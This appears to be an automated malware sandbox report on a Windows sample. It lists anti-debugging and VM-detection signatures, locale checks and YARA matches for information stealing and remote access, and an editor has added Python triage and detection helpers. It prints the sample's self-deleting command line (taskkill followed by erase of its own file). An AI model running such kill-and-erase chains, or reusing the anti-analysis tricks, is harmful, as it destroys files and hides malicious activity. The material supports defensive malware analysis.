Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe API coverage: 9.6 %
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004306A8 GetSystemTimes followed by cmp: cmp dword ptr [00437b24h], 0ah and CTI: jne 004308A0h 0_2_004306A8
Source: Amcache.hve.9.dr Binary or memory string: VMware
Source: Amcache.hve.9.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.9.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.9.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.9.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.9.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.9.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.9.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: file.exe, 00000000.00000002.2073863942.0000000002DA0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.9.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.9.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.9.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.9.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.9.dr Binary or memory string: vmci.sys
Source: Amcache.hve.9.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.9.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.9.dr Binary or memory string: \driver\vmci,\driver\pci
Source: file.exe, 00000000.00000002.2073485392.000000000086B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW 7
Source: Amcache.hve.9.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.9.dr Binary or memory string: VMware20,1
Source: Amcache.hve.9.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.9.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.9.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.9.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.9.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.9.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.9.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.9.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.9.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.9.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.9.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
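A caveat on the VMware and Hyper-V strings listed above, with an added triage helper (editor's code, not part of the report): `Amcache.hve.9.dr` is a copy of the analysis machine's Amcache registry hive, which inventories the host's own drivers and devices, so VMware device names found in it describe the sandbox, not a check performed by the sample. Only strings found in the sample's own memory dumps, or in the file itself, bear on whether it fingerprints virtual machines. The helper parses `Source: ... Binary or memory string: ...` lines and splits the hits by origin; the source-name conventions it assumes (`.dr` for a dropped file, `.sdmp` for a memory dump whose first dotted field is the process index, `00000000` being file.exe in this report) are taken from the naming used in this report and are an assumption of the example.

```python
import re
from collections import defaultdict

LINE_RE = re.compile(r"^Source:\s+(?P<source>.+?)\s+Binary or memory string:\s+(?P<text>.*)$")
VM_HINT_RE = re.compile(r"vmware|vmci|hyper-v|virtual", re.I)

SAMPLE_PROCESS_INDEX = "00000000"   # file.exe is process 0 in this report's numbering (assumed)


def classify_source(source: str) -> str:
    """Map a Joe Sandbox source name to where the string was actually found."""
    if source.endswith(".dr"):
        return "dropped file (host artifact if it is a registry hive)"
    if source.endswith(".sdmp"):
        # "file.exe, 00000000.00000002.<...>.sdmp": the dump name follows the comma
        dump_name = source.split(",")[-1].strip()
        pid_index = dump_name.split(".")[0]
        if pid_index == SAMPLE_PROCESS_INDEX:
            return "sample memory"
        return f"memory of process {pid_index}"
    return "other"


def triage_vm_strings(report_lines):
    """Group VM-related strings by origin and say which ones count as evidence."""
    hits = defaultdict(list)
    for line in report_lines:
        m = LINE_RE.match(line.strip())
        if not m or not VM_HINT_RE.search(m["text"]):
            continue
        hits[classify_source(m["source"])].append(m["text"])
    return {
        "by_origin": dict(hits),
        "sample_evidence": hits.get("sample memory", []),
        "host_artifacts": [t for k, v in hits.items() if k.startswith("dropped file") for t in v],
    }


# Constructed excerpt: three VM-related lines copied from the report plus one
# unrelated line, to show the split.
REPORT_EXCERPT = """
Source: Amcache.hve.9.dr Binary or memory string: VMware Virtual USB Mouse
Source: file.exe, 00000000.00000002.2073863942.0000000002DA0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.9.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.9.dr Binary or memory string: VMware, Inc.
""".strip().splitlines()

if __name__ == "__main__":
    result = triage_vm_strings(REPORT_EXCERPT)
    print("evidence from sample memory:", result["sample_evidence"])
    print("host artifacts:", result["host_artifacts"])
```

Even the one string that survives the split, `Hyper-V RAW`, is weak on its own: it is typically the Winsock catalog name of the Hyper-V socket provider, which any process that loads the Winsock catalog will carry in memory, so it should be weighed together with the `cpuid` and time-based checks rather than read as a VM fingerprint by itself.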
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004018E0 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,LdrInitializeThunk,MultiByteToWideChar,MultiByteToWideChar, 0_2_004018E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004084E5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_004084E5
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00411002 mov eax, dword ptr fs:[00000030h] 0_2_00411002
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040C4F1 mov eax, dword ptr fs:[00000030h] 0_2_0040C4F1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005F092B mov eax, dword ptr fs:[00000030h] 0_2_005F092B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00601269 mov eax, dword ptr fs:[00000030h] 0_2_00601269
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005F0D90 mov eax, dword ptr fs:[00000030h] 0_2_005F0D90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005FC758 mov eax, dword ptr fs:[00000030h] 0_2_005FC758
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007C4A8B push dword ptr fs:[00000030h] 0_2_007C4A8B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004168EC GetProcessHeap, 0_2_004168EC
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00407B06 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00407B06
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004084E5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_004084E5
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00408679 SetUnhandledExceptionFilter, 0_2_00408679
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040BFEB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0040BFEB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005F88E0 SetUnhandledExceptionFilter, 0_2_005F88E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005FC252 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_005FC252
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005F7D6D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_005F7D6D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005F874C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_005F874C
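The `mov eax, dword ptr fs:[00000030h]` and `push dword ptr fs:[00000030h]` hits above are reads of the 32-bit PEB pointer from the TEB; together with the `IsDebuggerPresent` call chains they are the usual static tells for a debugger check. As an added example, the scanner below (editor's code, not Joe Sandbox's) finds those instruction encodings in a raw 32-bit code buffer and reports whether a read of `PEB.BeingDebugged` (offset 2) follows within a few bytes, which separates a genuine debugger check from code that merely walks the PEB for `Ldr`. The buffer it scans is constructed for the example and is not taken from the sample.

```python
import re

# 32-bit encodings of "load the PEB pointer from fs:[0x30]":
#   64 A1 30 00 00 00             mov eax, dword ptr fs:[30h]
#   64 8B 05/0D/15/1D 30 00 00 00 mov eax/ecx/edx/ebx, dword ptr fs:[30h]
#   64 FF 35 30 00 00 00          push dword ptr fs:[30h]
PEB_LOAD_RE = re.compile(rb"\x64(?:\xa1|\x8b[\x05\x0d\x15\x1d]|\xff\x35)\x30\x00\x00\x00")

# Reads of PEB.BeingDebugged (offset 2) through eax/ecx/edx/ebx:
#   0F B6 40..43 02               movzx eax, byte ptr [reg+2]
#   80 78..7B 02 00               cmp byte ptr [reg+2], 0
BEING_DEBUGGED_RE = re.compile(rb"\x0f\xb6[\x40-\x43]\x02|\x80[\x78-\x7b]\x02\x00")

WINDOW = 16  # bytes after the PEB load in which to look for the flag read


def scan_peb_checks(code: bytes, base: int = 0x400000) -> list:
    """Return one finding per fs:[30h] access found in `code`.

    Each finding carries the virtual address (base + offset), the raw
    instruction bytes, and whether a BeingDebugged read follows closely,
    which upgrades the hit from "reads PEB" to "likely debugger check".
    """
    findings = []
    for m in PEB_LOAD_RE.finditer(code):
        window = code[m.end(): m.end() + WINDOW]
        findings.append({
            "va": base + m.start(),
            "bytes": m.group().hex(" "),
            "being_debugged_read": BEING_DEBUGGED_RE.search(window) is not None,
        })
    return findings


# Constructed demo buffer (not sample bytes): a function prologue, a manual
# PEB.BeingDebugged check, padding, then a bare PEB read that only walks to
# PEB.Ldr (offset 0Ch) and is therefore not a debugger check.
DEMO_CODE = (
    b"\x55\x8b\xec"                      # push ebp; mov ebp, esp
    + b"\x64\xa1\x30\x00\x00\x00"        # mov eax, fs:[30h]
    + b"\x0f\xb6\x40\x02"                # movzx eax, byte ptr [eax+2]
    + b"\x85\xc0\x75\x02"                # test eax, eax; jnz +2
    + b"\x90" * 24                       # padding
    + b"\x64\x8b\x0d\x30\x00\x00\x00"    # mov ecx, fs:[30h]
    + b"\x8b\x49\x0c"                    # mov ecx, [ecx+0Ch]  (PEB.Ldr)
    + b"\xc3"                            # ret
)

if __name__ == "__main__":
    for finding in scan_peb_checks(DEMO_CODE):
        print(finding)
```

The same byte patterns translate directly into a YARA rule; the window check is what keeps such a rule from firing on every runtime that touches the PEB for loader bookkeeping, which is why the report pairs the `fs:[30h]` hits with the `IsDebuggerPresent` chains rather than reporting them alone.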
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "file.exe" /f & erase "C:\Users\user\Desktop\file.exe" & exit Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "file.exe" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "file.exe" /f Jump to behavior
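The `cmd.exe /c taskkill /im "file.exe" /f & erase "C:\Users\user\Desktop\file.exe" & exit` chain above is the sample killing its own image and removing itself from disk. As an added example (editor's code, not part of the report), the detection below runs over process-creation records and flags a cmd.exe whose command line both kills and deletes the same image name as its parent process, which is what distinguishes this chain from routine `taskkill` use. The records are constructed in the style of Sysmon event 1 fields (`Image`, `ParentImage`, `CommandLine`); those field names and the two benign records are assumptions of the example.

```python
import re
from pathlib import PureWindowsPath

# taskkill ... /im <image>   (switch order free, quoted or bare image name)
TASKKILL_RE = re.compile(r'\btaskkill\b[^&]*?/im\s+"?([^"\s]+)"?', re.I)
# erase|del [switches] <path>  up to the next "&" or end of line
DELETE_RE = re.compile(r'\b(?:erase|del)\s+(?:/[a-z]\s+)*"?([^"&]+?)"?\s*(?:&|$)', re.I)


def _basename(path: str) -> str:
    return PureWindowsPath(path.strip().strip('"')).name.lower()


def self_delete_finding(event: dict):
    """Return a finding dict if `event` is a self-delete helper shell, else None.

    Logic: the process is cmd.exe, its command line both kills an image with
    taskkill and deletes a file, and the killed image, the deleted file's
    basename and the parent process image all agree.
    """
    if _basename(event["Image"]) != "cmd.exe":
        return None
    kill = TASKKILL_RE.search(event["CommandLine"])
    delete = DELETE_RE.search(event["CommandLine"])
    if not (kill and delete):
        return None
    killed = kill.group(1).lower()
    deleted_path = delete.group(1).strip()
    parent = _basename(event["ParentImage"])
    if killed == _basename(deleted_path) == parent:
        return {
            "parent": event["ParentImage"],
            "deleted": deleted_path,
            "rule": "parent kills and deletes its own image via cmd.exe",
        }
    return None


def scan_events(events):
    return [f for f in (self_delete_finding(e) for e in events) if f]


# Constructed records (not the report's raw logs); the first mirrors the
# command line quoted above, the other two are benign look-alikes.
EVENTS = [
    {
        "Image": r"C:\Windows\SysWOW64\cmd.exe",
        "ParentImage": r"C:\Users\user\Desktop\file.exe",
        "CommandLine": r'"C:\Windows\System32\cmd.exe" /c taskkill /im "file.exe" /f & erase "C:\Users\user\Desktop\file.exe" & exit',
    },
    {   # an admin killing a hung editor: kill without delete, parent is explorer
        "Image": r"C:\Windows\System32\cmd.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r"cmd.exe /c taskkill /im notepad.exe /f",
    },
    {   # uninstaller cleanup: kills and deletes app.exe, but the parent is setup.exe
        "Image": r"C:\Windows\System32\cmd.exe",
        "ParentImage": r"C:\Program Files\App\setup.exe",
        "CommandLine": r'cmd.exe /c taskkill /f /im app.exe & del /q "C:\Program Files\App\app.exe"',
    },
]

if __name__ == "__main__":
    for finding in scan_events(EVENTS):
        print(finding)
```

Requiring the parent image to match is what keeps the rule quiet on installers and admin scripts; dropping that condition turns it into a broader "kill then delete" hunt that is worth running retrospectively but not as a paging alert.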
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004086E3 cpuid 0_2_004086E3
Source: C:\Users\user\Desktop\file.exe Code function: EnumSystemLocalesW, 0_2_00418885
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 0_2_00418910
Source: C:\Users\user\Desktop\file.exe Code function: EnumSystemLocalesW, 0_2_00411112
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW, 0_2_00418B63
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_00418C89
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW, 0_2_00418D8F
Source: C:\Users\user\Desktop\file.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 0_2_00418E5E
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW, 0_2_00411634
Source: C:\Users\user\Desktop\file.exe Code function: EnumSystemLocalesW, 0_2_004187EA
Source: C:\Users\user\Desktop\file.exe Code function: EnumSystemLocalesW, 0_2_0041879F
Source: C:\Users\user\Desktop\file.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 0_2_006090C5
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW, 0_2_0060189B
Source: C:\Users\user\Desktop\file.exe Code function: EnumSystemLocalesW, 0_2_00608A51
Source: C:\Users\user\Desktop\file.exe Code function: EnumSystemLocalesW, 0_2_00608A06
Source: C:\Users\user\Desktop\file.exe Code function: EnumSystemLocalesW, 0_2_00608AEC
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 0_2_00608B77
Source: C:\Users\user\Desktop\file.exe Code function: EnumSystemLocalesW, 0_2_00601379
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW, 0_2_00608DCA
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_00608EF0
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW, 0_2_00608FF6
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040C891 GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, 0_2_0040C891
Source: Amcache.hve.9.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.9.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.9.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.9.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match File source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.5f0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.file.exe.740000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.1680069236.0000000000740000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match File source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.5f0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.file.exe.740000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.1680069236.0000000000740000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY